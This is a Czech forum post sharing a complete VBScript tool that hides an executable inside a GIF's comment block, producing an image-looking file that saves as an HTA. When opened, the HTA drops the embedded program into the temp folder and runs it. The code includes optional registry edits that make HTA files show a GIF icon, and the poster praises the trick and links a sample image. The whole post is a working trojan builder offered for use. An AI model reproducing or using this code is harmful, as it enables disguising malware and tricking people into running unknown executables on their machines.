objevil jsem dost good vbs script který schová do *.GIF souboru spustitelný kód ... A nejlepší na tom je že v IE a firefox se ten obrázek zobraí a když naněj kliknete pravým tlačítkem na myši a dáte "Uložit Jako .." tak se Uloží jak SOUBOR.HTA ve kterém je spustitelný kód ....
Toto je odkaz na autora [link]
v tomto obrázku je prográmek na Hypnotic (hypnotyzování točící se spirála)
[link]
'Zdrojový kód
' Title: Steganography: Hiding Data Within Data.
' Author: Vengy! (-_-)
' Tested: WinXP SP2 IE 6.0
' Email: cyber_flash@hotmail.com
' How it works:
' -------------
' Usage: cscript.exe hide.vbs your.gif your.exe
' This script merges "your.gif" and "your.exe" to create "your.gif.hta.gif",
' which correctly displays using the IE browser. ;)
' If the 'Hide extension for known file types' option is enabled, which is the default setting,
' the "Save Picture As..." downloads it as "your.gif". (it's really "your.gif.hta")
' Important:
' ----------
' Not all GIFs will work!? Trial and error is the best method
' to find suitable images. Included are some working GIFs that
' will merge correctly with any EXE. The image "your.gif" must be a GIF89a type and *not* GIF87a.
' GIF87a Versus GIF89a:
' ---------------------
' There are technically two types of GIF file: GIF87a and the newer, improved GIF89a.
' Both are fully supported on most browsers, and both use .gif as their file name suffix.
' GIF87a is the original format for indexed color images.
' It uses LZW compression and has the option of being interlaced.
' GIF89a is the same, but also includes transparency and animation capabilities.
' If you want to add these features to your graphic, you'll need to create the graphic with a tool
' that supports the GIF89a format. These features have become so popular with web developers that
' this format has become thede facto standard on the Web today.
' +------------------------------------------ ----------------------------------+
' | Let the games begin! |
' +------------------------------------------ ----------------------------------+
Option Explicit
Dim data,p,i,f,file,ub,ts,pic_buf,pic,args,x
set args=WScript.Arguments
If args.Count<>2 Then
WScript.Echo "Please type the following: cscript.exe hide.vbs your.gif your.exe"
WScript.Quit
End If
pic=args(0)
file=args(1)
Dim o:Set o=CreateObject("Scripting.FileSystemObject" )
Dim s:Set s=CreateObject("WScript.Shell")
'To change the HTA file icon to a GIF, uncomment these 2 lines:
's.RegWrite "HKLM\SOFTWARE\Classes\htafile\","GIF Image","REG_SZ"
's.RegWrite "HKLM\SOFTWARE\Classes\htafile\DefaultIcon\ ","%SystemRoot%\system32\shimgvw.dll,2","RE G_SZ"
Set f=o.CreateTextFile(pic&".hta.gif",2)
WScript.Echo "Processing "&pic&" ..."
pic_buf=RSBinaryToString(ReadBinaryFile(pic ))
' Remove end of gif hex tag 3B.
f.Write Left(pic_buf,len(pic_buf)-1)
' +------------------------------------------ ----------------------------------+
' | BEGIN: GIF comment block. |
' +------------------------------------------ ----------------------------------+
' Start new block tag.
f.Write chr(Int("&H21"))
' Comment tag.
f.Write chr(Int("&HFE"))
' Length of subblock. Seems to work!?
f.Write chr(Int("&HFF"))
' Start data vbscript
f.WriteLine "<script language=vbs>"
f.WriteLine "Set o=CreateObject("&chr(34)&"Scripting .FileSystemObject"&chr(34)&")"
f.WriteLine "Set s=CreateObject("&chr(34)&"WScript.S hell"&chr(34)&")"
f.WriteLine "p=o.GetSpecialFolder(2)&"&chr(34)& amp;"\"&file&chr(34)
' Create data hex array.
f.Write "t=split("&chr(34)
WScript.Echo "Processing "&file&" ..."
data=AsciiToHex(RSBinaryToString(ReadBinary File(file)))
ub=UBound(data)
For i=0 To ub-1
f.Write data(i)&","
Next
f.Write data(ub)
f.WriteLine chr(34)&","&chr(34)&","&chr (34)&")"
f.WriteLine "Set f=o.CreateTextFile(p,2)"
f.WriteLine "For i=0 To UBound(t)"
f.WriteLine "f.Write chr(Int("&chr(34)&"&H"&chr( 34)&"&t(i)))"
f.WriteLine "Next"
f.WriteLine "f.close"
' Run the data!
f.WriteLine "s.run(p)"
f.WriteLine "close()"
' End data vbscript.
f.WriteLine "</script>"
' End of comment block.
f.Write chr(Int("&H00"))
' +------------------------------------------ ----------------------------------+
' | END: GIF comment block. |
' +------------------------------------------ ----------------------------------+
' Insert end of gif tag.
f.Write chr(Int("&H3B"))
f.Close
' +------------------------------------------ ----------------------------------+
' | Done. Your.gif.hta.gif has been created. |
' +------------------------------------------ ----------------------------------+
Set x=o.GetFile(pic&".hta.gif")
WScript.Echo "Created "&chr(34)&pic&".hta.gif"&ch r(34)&" (bytes="&x.Size&")"
' +------------------------------------------ ----------------------------------+
' | Turns ASCII string sData into array of hex numerics. |
' +------------------------------------------ ----------------------------------+
Function AsciiToHex(sData)
Dim i, aTmp()
ReDim aTmp(Len(sData) - 1)
For i = 1 To Len(sData)
aTmp(i - 1) = Hex(Asc(Mid(sData, i)))
If len(aTmp(i - 1))=1 Then aTmp(i - 1)="0"+ aTmp(i - 1)
Next
ASCIItoHex = aTmp
End Function
' +------------------------------------------ ----------------------------------+
' | Converts binary data to a string (BSTR) using ADO recordset. |
' +------------------------------------------ ----------------------------------+
Function RSBinaryToString(xBinary)
Dim Binary
'MultiByte data must be converted To VT_UI1 | VT_ARRAY first.
If vartype(xBinary)=8 Then Binary = MultiByteToBinary(xBinary) Else Binary = xBinary
Dim RS, LBinary
Const adLongVarChar = 201
Set RS = CreateObject("ADODB.Recordset")
LBinary = LenB(Binary)
If LBinary>0 Then
RS.Fields.Append "mBinary", adLongVarChar, LBinary
RS.Open
RS.AddNew
RS("mBinary").AppendChunk Binary
RS.Update
RSBinaryToString = RS("mBinary")
Else
RSBinaryToString = ""
End If
End Function
' +------------------------------------------ ----------------------------------+
' | Read Binary file |
' +------------------------------------------ ----------------------------------+
Function ReadBinaryFile(FileName)
Const adTypeBinary = 1
Dim BinaryStream : Set BinaryStream = CreateObject("ADODB.Stream")
BinaryStream.Type = adTypeBinary
BinaryStream.Open
BinaryStream.LoadFromFile FileName
ReadBinaryFile = BinaryStream.Read
BinaryStream.Close
End Function
(odpovědět) |